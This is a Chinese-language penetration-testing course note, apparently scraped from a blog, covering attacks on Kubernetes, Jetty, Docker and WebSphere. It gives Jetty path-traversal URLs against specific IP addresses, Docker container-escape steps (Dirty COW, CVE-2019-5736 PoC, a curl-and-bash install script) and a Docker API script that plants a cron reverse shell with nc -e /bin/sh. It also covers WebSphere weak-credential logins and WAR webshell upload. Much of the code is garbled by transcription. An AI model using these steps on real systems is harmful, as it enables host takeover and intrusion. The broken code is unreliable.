第六十一天 服务攻防-中间件安全&CVE复现&K8S&Docker&Jetty&Websphere

第61天 服务攻防-中间件安全&CVE复现&K8S&Docker&Jetty&Websphere

知识点:

中间件及框架列表:

lIS,Apache,Nginx,Tomcat,Docker,Weblogic,JBoos,WebSphere,Jenkins,

GlassFish,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp,Sprng,Flask,jQuery

0、中间件-K8s安全

1、中间件Jey安全

2、中间件-Docker安全

3.中间件-WebSphere:安全

章节内容:

常见中间件的安全测试:

1、配置不当-解析&弱口令

2、安全机制特定安全漏洞

3、安全机制-弱口令爆破攻击

4、安全应用框架特定安全漏洞

前置知识:

中间件安全侧试流程:

1、判断中间件信息名称&版本&三方

2、判断仲间件问题-配置不当&公开漏洞

3、判断中间件利用-弱口令&EXP&框架漏洞

应用服务安全测试流程:见图

1、判断服务开放情况端口扫描&组合应用等

2、判断服务类型归属数据库&文件传输&通讯等

3、判断服务利用方式持定漏洞&未授权&弱口令等

演示案例

中间件K8s-搜哈

中间件Jety-搜哈

中间件Docker-搜哈

中间件-WebSphere-搜哈

配合下-Fofa_Viewer-搜哈

中间件-K8s-搜哈

kubernetest简称k8s,是一个由google开源的,用于自动部暑,扩展和管理容器化应用程序的开源系统。在B站内部,k8s在管理生产级容器和应用服务部署已经有较为广泛和成熟的应用。通过kK8$,可跨多台主机进行容器编排、快速按需扩展容器应用及其资源、对应

用实施状况检查、服务发现和负载均衡街等。

https://blog.csdn.net/w1590191166/article/details/122028001

中间件Jetty-搜哈

Elipse Jetty是一个开源的servlet容器,它为基于Java的Web容器提供运行环境。

CVE-2021-28164

http://123.58.236.76.63126/./WEB-INF/web.Xxml

CVE-2021-28169

http://123.58.236.76:63126/static?/WEB-INF/web.xml

CVE-2021-34429

http:/123.58.236.76:63126/%u002eWEB-NF/web.xml

中间件-Docker-搜哈

Docker容器是使用沙盒机制,是单独的系统,理论上是很安全的,通过利用某种手段,再结合执行POC或EXP,就可以返回一个宿主机的高权限Shll,并拿到宿主机的root权限,可以直接操作宿主机文件。它从容器中逃了出来,因此我们形象的称为Dockeri逃逸漏洞。

1、容器判断:判断当前是否是容器环境

-是否存在.dockerenv文件

python 复制代码
Is -alh /.dockerenv

查间系统进程的cgroup信息:

python 复制代码
cat /proc/1/cgroup

2、容器逃逸漏洞:权限提升

-由两核漏洞引起一Dirty C0W(CVE-2016-5195)

-由Docker软件设计引起CVE-2019-5736、CVE-2019-14271,CVE-2020-15257

由配置不当引起一开启privileged(特权模式)+宿主机目录挂载(文件挂载)、功能

(capabilities)机制、sock通信方式

CVE-2016-5195

https://github.com/gebl/dirtycow-docker-vdso

https://www.ichunqiu.com/experiment/catalog?id=100295

第一步、启动容器:

#使用本地1234端口连接docker的1234端口运行dirtycow镜像,并将其临时命名为test

#其中tst:为临时名称,可以自定义填写。p:第一个端口为本机的端口,第二个端口

为Docker的端口。-td:意思是在后台运行,交互式运行,并且输出当前的信息

bin/bash:调用Shel

python 复制代码
docker run --name=test-p 1234:1234 -itd dirtycow /bin/bash

第二部、进入容器:

#进入镜像内部

python 复制代码
docker exec-it test /bin/bash

第三步、

#编译并运行POC

python 复制代码
cd /dirtycow-vdso/
make
/0xdeadbeef

执行操作即可作用宿主机

-CVE-2019-5736

参考:https:///blog.51cto.com/u_15060465/4336524

复现:curl

https://aist_githubusercontent.com/thinkycx/e2c9090f035d7b09156077903d6afa51/raw -o

install.sh &bash install.sh

1、下载POC

python 复制代码
git clone https://github.com/Frichetten/CVE-2019-5736-PoC

2、修改编译生成payload

python 复制代码
CGO ENABLED=0 GOOS=linux GOARCH=amd64 go build main.go

2、修改编译生成payload

python 复制代码
CGO ENABLED=0 GOOS=linux GOARCH=amd64 go build main.go

3.将该payload拷贝到docker容器中(此时可以模拟攻击者获取了docker容器权限,在容器

中上传payload进行dockeri逃逸)并执行

python 复制代码
docker cp main ecca872da49d:/home
docker exec-it ecca872da49d bash
cd /home/
chmod 777 main
/main

4、再次进入docker镜像后监听即可收到

python 复制代码
docker exec-t镜像ID bash
nc -lwvp

3、容器安全漏洞

docker未授权访问漏洞-vulhub-exp.py

python 复制代码
import docker
client docker.DockerClient(base_url='http://IP:2375/)
data=client.containers.run(alpine:latest',r"sh-c"echo****usr/bin/nc反弹IP端☐-e
bin/sh'>>/tmp/etc/crontabs/root"",remove=True,volumes=f/etc":(bind':'/tmp/etc',
'mode':'nw)))

中间件-WebSphere-搜哈

WebSphere@Application Server加速交付新应用程序和服务,它可以通过快速交付创新

的应用程序来帮助企业提供丰富的用户体验从基于开放标准的丰富的编程模型中进行选

择,以便更好地协调项目需求与编程模型功能和开发人员技能。

端口:9080一web(http)应用访问端口、9443-web(https)应用访i问端口、9060一管理后台

访问端口、9043一管理控制台安全端口、8880一SOAP连接器端口等等。

漏洞探测在8880满口,后台是9060端口,解析是9080端口

拉取镜像:docker pull iscrosales/websphere7

启动镜像:docker run-d-p9060:9060-p9043:9043-p8880:8880-p9080:9080

iscrosales/websphere7

停止镜像:docker stop $(docker ps-aq)

1、CVE-2015-7450反序列化

工具搜哈:http://147.94.236.117:8880/

2、弱☐令上传拿Shell

-在6x至7.0版本,后台登陆只需要输入admin作为用户标识,无需密码,即可登陆后台。

-websphere/websphere

-system/manager

访i问:http:147.94.236.117:9060/

登录:admin

上传:war马

启动:1_war

连接:http://47.94.236.117:9080/1/1jsp

3、CVE-2020-4450:无利用P0C/EXP

相关推荐
Java陈序员5 小时前
轻量强大!一款现代化的 Kubernetes 集群管理与监控工具!
云原生·容器·kubernetes
Johny_Zhao1 天前
OpenClaw中级到高级教程
linux·人工智能·信息安全·kubernetes·云计算·yum源·系统运维·openclaw
用户962377954483 天前
VulnHub DC-3 靶机渗透测试笔记
安全
叶落阁主4 天前
Tailscale 完全指南:从入门到私有 DERP 部署
运维·安全·远程工作
可观测性用观测云5 天前
云原生网关 Ingress-Nginx 链路追踪实战:OpenTelemetry 采集与观测云集成方案
nginx·kubernetes
用户962377954486 天前
DVWA 靶场实验报告 (High Level)
安全
数据智能老司机6 天前
用于进攻性网络安全的智能体 AI——在 n8n 中构建你的第一个 AI 工作流
人工智能·安全·agent
数据智能老司机6 天前
用于进攻性网络安全的智能体 AI——智能体 AI 入门
人工智能·安全·agent
用户962377954486 天前
DVWA 靶场实验报告 (Medium Level)
安全
red1giant_star6 天前
S2-067 漏洞复现:Struts2 S2-067 文件上传路径穿越漏洞
安全